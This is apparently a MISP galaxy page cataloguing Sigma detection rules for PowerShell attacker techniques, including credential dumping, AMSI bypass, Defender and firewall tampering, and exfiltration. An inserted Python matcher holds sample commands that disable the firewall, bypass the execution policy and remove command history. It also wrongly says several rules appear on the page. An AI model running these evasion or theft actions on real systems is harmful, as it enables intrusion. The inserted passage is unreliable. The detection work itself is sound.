UUID fbc5e92f-3044-4e73-a5c6-1c4359b539de which can be used as unique global reference for PowerShell Script With File Hostname Resolving Capabilities in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2023/05/05
falsepositive ['The same functionality can be implemented by admin scripts, correlate with name and creator']
filename posh_ps_resolve_list_of_ip_from_file.yml
level medium
logsource.category ps_script
logsource.product windows
tags ['attack.exfiltration', 'attack.t1020']
Related clusters

To see the related clusters, click here.

Dump Credentials from Windows Credential Manager With PowerShell

Adversaries may search for common password storage locations to obtain user credentials. Passwords are stored in several places on a system, depending on the operating system or application holding the credentials.

Internal MISP references

UUID 99c49d9c-34ea-45f7-84a7-4751ae6b2cbc which can be used as unique global reference for Dump Credentials from Windows Credential Manager With PowerShell in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113
creation_date 2021/12/20
falsepositive ['Unknown']
filename posh_ps_dump_password_windows_credential_manager.yml
level medium
logsource.category ps_script
logsource.product windows
tags ['attack.credential_access', 'attack.t1555']
Related clusters

To see the related clusters, click here.

Suspicious SSL Connection

Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol.

Internal MISP references

UUID 195626f3-5f1b-4403-93b7-e6cfd4d6a078 which can be used as unique global reference for Suspicious SSL Connection in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113
creation_date 2022/01/23
falsepositive ['Legitimate administrative script']
filename posh_ps_susp_ssl_keyword.yml
level low
logsource.category ps_script
logsource.product windows
tags ['attack.command_and_control', 'attack.t1573']
Related clusters

To see the related clusters, click here.

Potential In-Memory Execution Using Reflection.Assembly

Detects usage of "Reflection.Assembly" load functions to dynamically load assemblies in memory

Internal MISP references

UUID ddcd88cb-7f62-4ce5-86f9-1704190feb0a which can be used as unique global reference for Potential In-Memory Execution Using Reflection.Assembly in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113
creation_date 2022/12/25
falsepositive ['Legitimate use of the library']
filename posh_ps_dotnet_assembly_from_file.yml
level medium
logsource.category ps_script
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1620']
Related clusters

To see the related clusters, click here.

HackTool - WinPwn Execution - ScriptBlock

Detects script block text keywords indicative of potential usage of the tool WinPwn, a tool for Windows and Active Directory reconnaissance and exploitation.

Internal MISP references

UUID 851fd622-b675-4d26-b803-14bc7baa517a which can be used as unique global reference for HackTool - WinPwn Execution - ScriptBlock in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Swachchhanda Shrawan Poudel
creation_date 2023/12/04
falsepositive ['As the script block is a blob of text. False positive may occur with scripts that contain the keyword as a reference or simply use it for detection.']
filename posh_ps_hktl_winpwn.yml
level high
logsource.category ps_script
logsource.product windows
tags ['attack.credential_access', 'attack.defense_evasion', 'attack.discovery', 'attack.execution', 'attack.privilege_escalation', 'attack.t1046', 'attack.t1082', 'attack.t1106', 'attack.t1518', 'attack.t1548.002', 'attack.t1552.001', 'attack.t1555', 'attack.t1555.003']
Related clusters

To see the related clusters, click here.

Suspicious Get-ADReplAccount

The DSInternals PowerShell Module exposes several internal features of Active Directory and Azure Active Directory. These include FIDO2 and NGC key auditing, offline ntds.dit file manipulation, password auditing, DC recovery from IFM backups and password hash calculation.

Internal MISP references

UUID 060c3ef1-fd0a-4091-bf46-e7d625f60b73 which can be used as unique global reference for Suspicious Get-ADReplAccount in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113
creation_date 2022/02/06
falsepositive ['Legitimate PowerShell scripts']
filename posh_ps_get_adreplaccount.yml
level medium
logsource.category ps_script
logsource.product windows
tags ['attack.credential_access', 'attack.t1003.006']
Related clusters

To see the related clusters, click here.

Disable of ETW Trace - Powershell

Detects usage of powershell cmdlets to disable or remove ETW trace sessions

Internal MISP references

UUID 115fdba9-f017-42e6-84cf-d5573bf2ddf8 which can be used as unique global reference for Disable of ETW Trace - Powershell in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2022/06/28
falsepositive ['Unknown']
filename posh_ps_etw_trace_evasion.yml
level high
logsource.category ps_script
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1070', 'attack.t1562.006', 'car.2016-04-002']
Related clusters

To see the related clusters, click here.

Change PowerShell Policies to an Insecure Level - PowerShell

Detects changing the PowerShell script execution policy to a potentially insecure level using the "Set-ExecutionPolicy" cmdlet.

Internal MISP references

UUID 61d0475c-173f-4844-86f7-f3eebae1c66b which can be used as unique global reference for Change PowerShell Policies to an Insecure Level - PowerShell in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113
creation_date 2021/10/20
falsepositive ['Administrator script']
filename posh_ps_set_policies_to_unsecure_level.yml
level medium
logsource.category ps_script
logsource.product windows
tags ['attack.execution', 'attack.t1059.001']
Related clusters

To see the related clusters, click here.

DirectorySearcher Powershell Exploitation

Enumerates Active Directory to determine computers that are joined to the domain

Internal MISP references

UUID 1f6399cf-2c80-4924-ace1-6fcff3393480 which can be used as unique global reference for DirectorySearcher Powershell Exploitation in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113
creation_date 2022/02/12
falsepositive ['Unknown']
filename posh_ps_directorysearcher.yml
level medium
logsource.category ps_script
logsource.product windows
tags ['attack.discovery', 'attack.t1018']
Related clusters

To see the related clusters, click here.

Suspicious Unblock-File

Detects usage of the "Unblock-File" cmdlet, which removes the Zone.Identifier alternate data stream that marks a file as downloaded from the internet.

Internal MISP references

UUID 5947497f-1aa4-41dd-9693-c9848d58727d which can be used as unique global reference for Suspicious Unblock-File in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113
creation_date 2022/02/01
falsepositive ['Legitimate PowerShell scripts']
filename posh_ps_susp_unblock_file.yml
level medium
logsource.category ps_script
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1553.005']
Related clusters

To see the related clusters, click here.

Powershell Suspicious Win32_PnPEntity

Adversaries may attempt to gather information about attached peripheral devices and components connected to a computer system.

Internal MISP references

UUID b26647de-4feb-4283-af6b-6117661283c5 which can be used as unique global reference for Powershell Suspicious Win32_PnPEntity in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113
creation_date 2021/08/23
falsepositive ['Admin script']
filename posh_ps_susp_win32_pnpentity.yml
level low
logsource.category ps_script
logsource.product windows
tags ['attack.discovery', 'attack.t1120']
Related clusters

To see the related clusters, click here.

Enumerate Credentials from Windows Credential Manager With PowerShell

Adversaries may search for common password storage locations to obtain user credentials. Passwords are stored in several places on a system, depending on the operating system or application holding the credentials.

Internal MISP references

UUID 603c6630-5225-49c1-8047-26c964553e0e which can be used as unique global reference for Enumerate Credentials from Windows Credential Manager With PowerShell in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113
creation_date 2021/12/20
falsepositive ['Unknown']
filename posh_ps_enumerate_password_windows_credential_manager.yml
level medium
logsource.category ps_script
logsource.product windows
tags ['attack.credential_access', 'attack.t1555']
Related clusters

To see the related clusters, click here.

Invoke-Obfuscation Via Use Rundll32 - PowerShell

Detects obfuscated PowerShell that uses Rundll32 in scripts

Internal MISP references

UUID a5a30a6e-75ca-4233-8b8c-42e0f2037d3b which can be used as unique global reference for Invoke-Obfuscation Via Use Rundll32 - PowerShell in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nikita Nazarov, oscd.community
creation_date 2019/10/08
falsepositive ['Unknown']
filename posh_ps_invoke_obfuscation_via_use_rundll32.yml
level high
logsource.category ps_script
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1027', 'attack.execution', 'attack.t1059.001']
Related clusters

To see the related clusters, click here.

Tamper Windows Defender Remove-MpPreference - ScriptBlockLogging

Detects attempts to remove Windows Defender configuration using the "Remove-MpPreference" cmdlet

Internal MISP references

UUID ae2bdd58-0681-48ac-be7f-58ab4e593458 which can be used as unique global reference for Tamper Windows Defender Remove-MpPreference - ScriptBlockLogging in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2022/08/05
falsepositive ['Legitimate PowerShell scripts']
filename posh_ps_tamper_windows_defender_rem_mp.yml
level high
logsource.category ps_script
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1562.001']
Related clusters

To see the related clusters, click here.

Powershell Execute Batch Script

Adversaries may abuse the Windows command shell for execution. The Windows command shell (cmd) is the primary command prompt on Windows systems. The Windows command prompt can be used to control almost any aspect of a system, with various permission levels required for different subsets of commands. Batch files (ex: .bat or .cmd) also provide the shell with a list of sequential commands to run, as well as normal scripting operations such as conditionals and loops. Common uses of batch files include long or repetitive tasks, or the need to run the same set of commands on multiple systems.

Internal MISP references

UUID b5522a23-82da-44e5-9c8b-e10ed8955f88 which can be used as unique global reference for Powershell Execute Batch Script in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113
creation_date 2022/01/02
falsepositive ['Legitimate administration script']
filename posh_ps_susp_execute_batch_script.yml
level medium
logsource.category ps_script
logsource.product windows
tags ['attack.execution', 'attack.t1059.003']
Related clusters

To see the related clusters, click here.

Invoke-Obfuscation Obfuscated IEX Invocation - PowerShell

Detects all variations of obfuscated PowerShell IEX invocation code generated by the Invoke-Obfuscation framework from the following code block —

Internal MISP references

UUID 1b9dc62e-6e9e-42a3-8990-94d7a10007f7 which can be used as unique global reference for Invoke-Obfuscation Obfuscated IEX Invocation - PowerShell in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Daniel Bohannon (@Mandiant/@FireEye), oscd.community
creation_date 2019/11/08
falsepositive ['Unknown']
filename posh_ps_invoke_obfuscation_obfuscated_iex.yml
level high
logsource.category ps_script
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1027', 'attack.execution', 'attack.t1059.001']
Related clusters

To see the related clusters, click here.

Unsigned AppX Installation Attempt Using Add-AppxPackage - PsScript

Detects usage of "Add-AppxPackage" or its alias "Add-AppPackage" to install unsigned AppX packages

Internal MISP references

UUID 975b2262-9a49-439d-92a6-0709cccdf0b2 which can be used as unique global reference for Unsigned AppX Installation Attempt Using Add-AppxPackage - PsScript in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2023/01/31
falsepositive ['Installation of unsigned packages for testing purposes']
filename posh_ps_install_unsigned_appx_packages.yml
level medium
logsource.category ps_script
logsource.product windows
tags ['attack.persistence', 'attack.defense_evasion']

Modify Group Policy Settings - ScriptBlockLogging

Detects malicious GPO modifications, which can be used to implement many other malicious behaviors.

Internal MISP references

UUID b7216a7d-687e-4c8d-82b1-3080b2ad961f which can be used as unique global reference for Modify Group Policy Settings - ScriptBlockLogging in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113
creation_date 2022/08/19
falsepositive ['Legitimate use']
filename posh_ps_modify_group_policy_settings.yml
level medium
logsource.category ps_script
logsource.product windows
tags ['attack.defense_evasion', 'attack.privilege_escalation', 'attack.t1484.001']
Related clusters

To see the related clusters, click here.

Powershell Store File In Alternate Data Stream

Storing files in Alternate Data Stream (ADS) similar to Astaroth malware.

Internal MISP references

UUID a699b30e-d010-46c8-bbd1-ee2e26765fe9 which can be used as unique global reference for Powershell Store File In Alternate Data Stream in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113
creation_date 2021/09/02
falsepositive ['Unknown']
filename posh_ps_store_file_in_alternate_data_stream.yml
level medium
logsource.category ps_script
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1564.004']
Related clusters

To see the related clusters, click here.

Windows Screen Capture with CopyFromScreen

Adversaries may attempt to take screen captures of the desktop to gather information over the course of an operation. Screen capturing functionality may be included as a feature of a remote access tool used in post-compromise operations

Internal MISP references

UUID d4a11f63-2390-411c-9adf-d791fd152830 which can be used as unique global reference for Windows Screen Capture with CopyFromScreen in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113
creation_date 2021/12/28
falsepositive ['Unknown']
filename posh_ps_capture_screenshots.yml
level medium
logsource.category ps_script
logsource.product windows
tags ['attack.collection', 'attack.t1113']
Related clusters

To see the related clusters, click here.

Suspicious PowerShell Download - Powershell Script

Detects suspicious PowerShell download command

Internal MISP references

UUID 403c2cc0-7f6b-4925-9423-bfa573bed7eb which can be used as unique global reference for Suspicious PowerShell Download - Powershell Script in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems)
creation_date 2017/03/05
falsepositive ['PowerShell scripts that download content from the Internet']
filename posh_ps_susp_download.yml
level medium
logsource.category ps_script
logsource.product windows
tags ['attack.execution', 'attack.t1059.001']
Related clusters

To see the related clusters, click here.

PowerShell Credential Prompt

Detects PowerShell calling a credential prompt

Internal MISP references

UUID ca8b77a9-d499-4095-b793-5d5f330d450e which can be used as unique global reference for PowerShell Credential Prompt in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author John Lambert (idea), Florian Roth (Nextron Systems)
creation_date 2017/04/09
falsepositive ['Unknown']
filename posh_ps_prompt_credentials.yml
level high
logsource.category ps_script
logsource.product windows
tags ['attack.credential_access', 'attack.execution', 'attack.t1059.001']
Related clusters

To see the related clusters, click here.

Execute Invoke-command on Remote Host

Adversaries may use Valid Accounts to interact with remote systems using Windows Remote Management (WinRM). The adversary may then perform actions as the logged-on user.

Internal MISP references

UUID 7b836d7f-179c-4ba4-90a7-a7e60afb48e6 which can be used as unique global reference for Execute Invoke-command on Remote Host in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113
creation_date 2022/01/07
falsepositive ['Legitimate script']
filename posh_ps_invoke_command_remote.yml
level medium
logsource.category ps_script
logsource.product windows
tags ['attack.lateral_movement', 'attack.t1021.006']
Related clusters

To see the related clusters, click here.

Powershell Add Name Resolution Policy Table Rule

Detects PowerShell scripts that add a Name Resolution Policy Table (NRPT) rule for the specified namespace. Such a rule bypasses the default DNS server and sends queries for that namespace to the specified server instead.

Internal MISP references

UUID 4368354e-1797-463c-bc39-a309effbe8d7 which can be used as unique global reference for Powershell Add Name Resolution Policy Table Rule in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Borna Talebi
creation_date 2021/09/14
falsepositive ['Unknown']
filename posh_ps_add_dnsclient_rule.yml
level high
logsource.category ps_script
logsource.product windows
tags ['attack.impact', 'attack.t1565']
Related clusters

To see the related clusters, click here.
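Several of the rules on this page (Computer Discovery And Export Via Get-ADComputer, Disable Powershell Command History, Windows Firewall Profile Disabled, Change PowerShell Policies to an Insecure Level, and the NRPT rule above) are keyword matches on the ScriptBlockText of Event ID 4104. The following is an added example, not code from this page or from the Sigma project, of how such detections are evaluated, including the filter-based tuning the Get-ADComputer rule's false-positive note recommends. The keyword selections are my own reading of the rule descriptions, not the detection sections of the real rule files; the sample events and the excluded admin-script path are constructed.

```python
"""
Minimal Sigma-style matcher for PowerShell script block (Event ID 4104) text.

Added example, not code from the MISP page or the Sigma project. Keyword
selections approximate the rule descriptions; events are constructed.
Semantics mirrored from Sigma: a `contains` list is OR, `contains|all` is AND,
matching is case-insensitive, and the condition is `selection and not filter`.
"""
from dataclasses import dataclass


@dataclass
class Rule:
    title: str
    level: str
    # each selection: ("any" | "all", keywords) -> Sigma `contains` / `contains|all`
    selections: list
    # optional filter on the script Path, for tuning away known admin scripts
    exclude_path_prefixes: tuple = ()


def _selection_hits(text: str, mode: str, keywords) -> bool:
    t = text.lower()
    hits = [k.lower() in t for k in keywords]
    return all(hits) if mode == "all" else any(hits)


def rule_matches(rule: Rule, event: dict) -> bool:
    """Every selection must hold on ScriptBlockText and no path filter may apply."""
    text = event.get("ScriptBlockText", "")
    path = (event.get("Path") or "").lower()
    if any(path.startswith(p.lower()) for p in rule.exclude_path_prefixes):
        return False
    return all(_selection_hits(text, mode, kws) for mode, kws in rule.selections)


RULES = [
    Rule("Change PowerShell Policies to an Insecure Level - PowerShell", "medium",
         [("any", ["Set-ExecutionPolicy"]), ("any", ["Unrestricted", "Bypass"])]),
    Rule("Disable Powershell Command History", "high",
         [("all", ["Remove-Module", "PSReadLine"])]),
    Rule("Windows Firewall Profile Disabled", "medium",
         [("all", ["Set-NetFirewallProfile", "-Enabled", "False"])]),
    Rule("Powershell Add Name Resolution Policy Table Rule", "high",
         [("all", ["Add-DnsClientNrptRule", "-Namespace", "-NameServers"])]),
    Rule("Computer Discovery And Export Via Get-ADComputer Cmdlet - PowerShell", "medium",
         [("any", ["Get-ADComputer"]), ("any", ["Export-Csv", "Out-File", "Set-Content"])],
         # hypothetical tuning: the inventory job under C:\ops\ is a known admin script
         exclude_path_prefixes=("C:\\ops\\",)),
]

# Constructed events in the shape of parsed 4104 records (not real logs).
SAMPLE_EVENTS = [
    {"ScriptBlockId": "e1", "Path": "",
     "ScriptBlockText": "Set-ExecutionPolicy -ExecutionPolicy Bypass -Scope CurrentUser -Force"},
    {"ScriptBlockId": "e2", "Path": "",
     "ScriptBlockText": "Remove-Module psreadline; $h = 'C:\\Users\\Public\\x.txt'"},
    {"ScriptBlockId": "e3", "Path": "C:\\ops\\harden.ps1",
     "ScriptBlockText": "Set-NetFirewallProfile -Profile Domain,Public,Private -Enabled True"},
    {"ScriptBlockId": "e4", "Path": "",
     "ScriptBlockText": "Set-NetFirewallProfile -Profile Public -Enabled False"},
    {"ScriptBlockId": "e5", "Path": "",
     "ScriptBlockText": "Add-DnsClientNrptRule -Namespace '.corp.example' -NameServers '10.0.0.53'"},
    {"ScriptBlockId": "e6", "Path": "C:\\ops\\inventory.ps1",
     "ScriptBlockText": "Get-ADComputer -Filter * | Select-Object Name | Export-Csv .\\hosts.csv"},
    {"ScriptBlockId": "e7", "Path": "",
     "ScriptBlockText": "Get-ADComputer -Filter * | Select-Object Name | Export-Csv .\\hosts.csv"},
]


def scan(events, rules=RULES):
    """Return (ScriptBlockId, rule title, level) for every rule that fires on each event."""
    alerts = []
    for ev in events:
        for rule in rules:
            if rule_matches(rule, ev):
                alerts.append((ev["ScriptBlockId"], rule.title, rule.level))
    return alerts


if __name__ == "__main__":
    for sbid, title, level in scan(SAMPLE_EVENTS):
        print(f"[{level:6}] {sbid}: {title}")
```

Note that e3 (enabling the firewall) and e6 (the same Get-ADComputer export, but from the excluded admin script) produce no alert, while e7, the identical command run interactively with no script path, still does; that is the shape of tuning the rule metadata suggests, excluding known scripts or users rather than the cmdlet.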

Malicious PowerShell Keywords

Detects keywords from well-known PowerShell exploitation frameworks

Internal MISP references

UUID f62176f3-8128-4faa-bf6c-83261322e5eb which can be used as unique global reference for Malicious PowerShell Keywords in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Sean Metcalf (source), Florian Roth (Nextron Systems)
creation_date 2017/03/05
falsepositive ['Depending on the scripts, this rule might require some initial tuning to fit the environment']
filename posh_ps_malicious_keywords.yml
level medium
logsource.category ps_script
logsource.product windows
tags ['attack.execution', 'attack.t1059.001']
Related clusters

To see the related clusters, click here.

PowerShell Set-Acl On Windows Folder - PsScript

Detects PowerShell scripts that set the ACL on a file in the Windows folder

Internal MISP references

UUID 3bf1d859-3a7e-44cb-8809-a99e066d3478 which can be used as unique global reference for PowerShell Set-Acl On Windows Folder - PsScript in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113, Nasreddine Bencherchali (Nextron Systems)
creation_date 2023/07/18
falsepositive ['Unknown']
filename posh_ps_set_acl_susp_location.yml
level high
logsource.category ps_script
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1222']
Related clusters

To see the related clusters, click here.

Invoke-Obfuscation VAR+ Launcher - PowerShell

Detects Obfuscated use of Environment Variables to execute PowerShell

Internal MISP references

UUID 0adfbc14-0ed1-11eb-adc1-0242ac120002 which can be used as unique global reference for Invoke-Obfuscation VAR+ Launcher - PowerShell in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Jonathan Cheong, oscd.community
creation_date 2020/10/15
falsepositive ['Unknown']
filename posh_ps_invoke_obfuscation_var.yml
level high
logsource.category ps_script
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1027', 'attack.execution', 'attack.t1059.001']
Related clusters

To see the related clusters, click here.

AD Groups Or Users Enumeration Using PowerShell - ScriptBlock

Adversaries may attempt to find domain-level groups and permission settings. The knowledge of domain-level permission groups can help adversaries determine which groups exist and which users belong to a particular group. Adversaries may use this information to determine which users have elevated permissions, such as domain administrators.

Internal MISP references

UUID 88f0884b-331d-403d-a3a1-b668cf035603 which can be used as unique global reference for AD Groups Or Users Enumeration Using PowerShell - ScriptBlock in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113
creation_date 2021/12/15
falsepositive ['Unknown']
filename posh_ps_susp_ad_group_reco.yml
level low
logsource.category ps_script
logsource.product windows
tags ['attack.discovery', 'attack.t1069.001']

PowerShell Write-EventLog Usage

Detects usage of the "Write-EventLog" cmdlet with the "RawData" parameter. The cmdlet can be leveraged to write malicious payloads into the event log and retrieve them later for execution.

Internal MISP references

UUID 35f41cd7-c98e-469f-8a02-ec4ba0cc7a7e which can be used as unique global reference for PowerShell Write-EventLog Usage in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2022/08/16
falsepositive ['Legitimate applications writing events via this cmdlet. Investigate alerts to determine if the action is benign']
filename posh_ps_susp_write_eventlog.yml
level medium
logsource.category ps_script
logsource.product windows
tags ['attack.defense_evasion']

Potential Active Directory Enumeration Using AD Module - PsScript

Detects usage of the "Import-Module" cmdlet to load the "Microsoft.ActiveDirectory.Management.dll" DLL, which is often used by attackers to perform AD enumeration.

Internal MISP references

UUID 9e620995-f2d8-4630-8430-4afd89f77604 which can be used as unique global reference for Potential Active Directory Enumeration Using AD Module - PsScript in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113, Nasreddine Bencherchali
creation_date 2023/01/22
falsepositive ['Legitimate use of the library for administrative activity']
filename posh_ps_active_directory_module_dll_import.yml
level medium
logsource.category ps_script
logsource.product windows
tags ['attack.reconnaissance', 'attack.discovery', 'attack.impact']

PowerShell ADRecon Execution

Detects execution of ADRecon.ps1 for AD reconnaissance, which has been reported to be actively used by FIN7.

Internal MISP references

UUID bf72941a-cba0-41ea-b18c-9aca3925690d which can be used as unique global reference for PowerShell ADRecon Execution in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Bhabesh Raj
creation_date 2021/07/16
falsepositive ['Unknown']
filename posh_ps_adrecon_execution.yml
level high
logsource.category ps_script
logsource.product windows
tags ['attack.discovery', 'attack.execution', 'attack.t1059.001']

Suspicious GPO Discovery With Get-GPO

Detects use of Get-GPO to retrieve a single GPO or all GPOs in a domain.

Internal MISP references

UUID eb2fd349-ec67-4caa-9143-d79c7fb34441 which can be used as unique global reference for Suspicious GPO Discovery With Get-GPO in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113
creation_date 2022/06/04
falsepositive ['Legitimate PowerShell scripts']
filename posh_ps_susp_get_gpo.yml
level low
logsource.category ps_script
logsource.product windows
tags ['attack.discovery', 'attack.t1615']

Disable-WindowsOptionalFeature Command PowerShell

Detects the built-in PowerShell cmdlet Disable-WindowsOptionalFeature from the Deployment Image Servicing and Management (DISM) module. Like DISM.exe, this cmdlet is used to enumerate, install, uninstall, configure, and update features and packages in Windows images.

Internal MISP references

UUID 99c4658d-2c5e-4d87-828d-7c066ca537c3 which can be used as unique global reference for Disable-WindowsOptionalFeature Command PowerShell in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113
creation_date 2022/09/10
falsepositive ['Unknown']
filename posh_ps_disable_windows_optional_feature.yml
level high
logsource.category ps_script
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1562.001']

Powershell LocalAccount Manipulation

Adversaries may manipulate accounts to maintain access to victim systems. Account manipulation may consist of any action that preserves adversary access to a compromised account, such as modifying credentials or permission groups.

Internal MISP references

UUID 4fdc44df-bfe9-4fcc-b041-68f5a2d3031c which can be used as unique global reference for Powershell LocalAccount Manipulation in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113
creation_date 2021/12/28
falsepositive ['Legitimate administrative script']
filename posh_ps_localuser.yml
level medium
logsource.category ps_script
logsource.product windows
tags ['attack.persistence', 'attack.t1098']

PowerShell ICMP Exfiltration

Detects Exfiltration Over Alternative Protocol - ICMP. Adversaries may steal data by exfiltrating it over an un-encrypted network protocol other than that of the existing command and control channel.

Internal MISP references

UUID 4c4af3cd-2115-479c-8193-6b8bfce9001c which can be used as unique global reference for PowerShell ICMP Exfiltration in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Bartlomiej Czyz @bczyz1, oscd.community
creation_date 2020/10/10
falsepositive ['Legitimate usage of System.Net.NetworkInformation.Ping class']
filename posh_ps_icmp_exfiltration.yml
level medium
logsource.category ps_script
logsource.product windows
tags ['attack.exfiltration', 'attack.t1048.003']

Silence.EDA Detection

Detects Silence EmpireDNSAgent (EDA) as described in the Group-IB report.

Internal MISP references

UUID 3ceb2083-a27f-449a-be33-14ec1b7cc973 which can be used as unique global reference for Silence.EDA Detection in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Alina Stepchenkova, Group-IB, oscd.community
creation_date 2019/11/01
falsepositive ['Unknown']
filename posh_ps_apt_silence_eda.yml
level critical
logsource.category ps_script
logsource.product windows
tags ['attack.execution', 'attack.t1059.001', 'attack.command_and_control', 'attack.t1071.004', 'attack.t1572', 'attack.impact', 'attack.t1529', 'attack.g0091', 'attack.s0363']

Testing Usage of Uncommonly Used Port

Adversaries may communicate using a protocol and port pairing that are typically not associated. For example, HTTPS over port 8088 (Citation: Symantec Elfin Mar 2019) or port 587 (Citation: Fortinet Agent Tesla April 2018) as opposed to the traditional port 443.

Internal MISP references

UUID adf876b3-f1f8-4aa9-a4e4-a64106feec06 which can be used as unique global reference for Testing Usage of Uncommonly Used Port in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113
creation_date 2022/01/23
falsepositive ['Legitimate administrative script']
filename posh_ps_test_netconnection.yml
level medium
logsource.category ps_script
logsource.product windows
tags ['attack.command_and_control', 'attack.t1571']

PowerShell Hotfix Enumeration

Detects calls to "Win32_QuickFixEngineering" in order to enumerate installed hotfixes, a step often found in attackers' "enum" scripts.

Internal MISP references

UUID f5d1def8-1de0-4a0e-9794-1f6f27dd605c which can be used as unique global reference for PowerShell Hotfix Enumeration in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2022/06/21
falsepositive ['Legitimate administration scripts']
filename posh_ps_hotfix_enum.yml
level medium
logsource.category ps_script
logsource.product windows
tags ['attack.discovery']

Replace Desktop Wallpaper by Powershell

An adversary may deface systems internal to an organization in an attempt to intimidate or mislead users. This may take the form of modifications to internal websites, or directly to user systems with the replacement of the desktop wallpaper.

Internal MISP references

UUID c5ac6a1e-9407-45f5-a0ce-ca9a0806a287 which can be used as unique global reference for Replace Desktop Wallpaper by Powershell in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113
creation_date 2021/12/26
falsepositive ['Unknown']
filename posh_ps_susp_wallpaper.yml
level low
logsource.category ps_script
logsource.product windows
tags ['attack.impact', 'attack.t1491.001']

Potential WinAPI Calls Via PowerShell Scripts

Detects use of WinAPI functions in PowerShell scripts

Internal MISP references

UUID 03d83090-8cba-44a0-b02f-0b756a050306 which can be used as unique global reference for Potential WinAPI Calls Via PowerShell Scripts in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems), Nikita Nazarov, oscd.community
creation_date 2020/10/06
falsepositive ['Unknown']
filename posh_ps_win_api_susp_access.yml
level high
logsource.category ps_script
logsource.product windows
tags ['attack.execution', 'attack.t1059.001', 'attack.t1106']

Potential AMSI Bypass Script Using NULL Bits

Detects usage of special strings/null bits in order to potentially bypass AMSI functionalities

Internal MISP references

UUID fa2559c8-1197-471d-9cdd-05a0273d4522 which can be used as unique global reference for Potential AMSI Bypass Script Using NULL Bits in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2023/01/04
falsepositive ['Unknown']
filename posh_ps_amsi_null_bits_bypass.yml
level medium
logsource.category ps_script
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1562.001']

Live Memory Dump Using Powershell

Detects usage of a PowerShell command to dump the live memory of a Windows machine

Internal MISP references

UUID cd185561-4760-45d6-a63e-a51325112cae which can be used as unique global reference for Live Memory Dump Using Powershell in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Max Altgelt (Nextron Systems)
creation_date 2021/09/21
falsepositive ['Diagnostics']
filename posh_ps_memorydump_getstoragediagnosticinfo.yml
level high
logsource.category ps_script
logsource.product windows
tags ['attack.t1003']

AADInternals PowerShell Cmdlets Execution - PsScript

Detects AADInternals cmdlet execution. AADInternals is a tool for administering Azure AD and Office 365 which can be abused by threat actors to attack Azure AD or Office 365.

Internal MISP references

UUID 91e69562-2426-42ce-a647-711b8152ced6 which can be used as unique global reference for AADInternals PowerShell Cmdlets Execution - PsScript in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
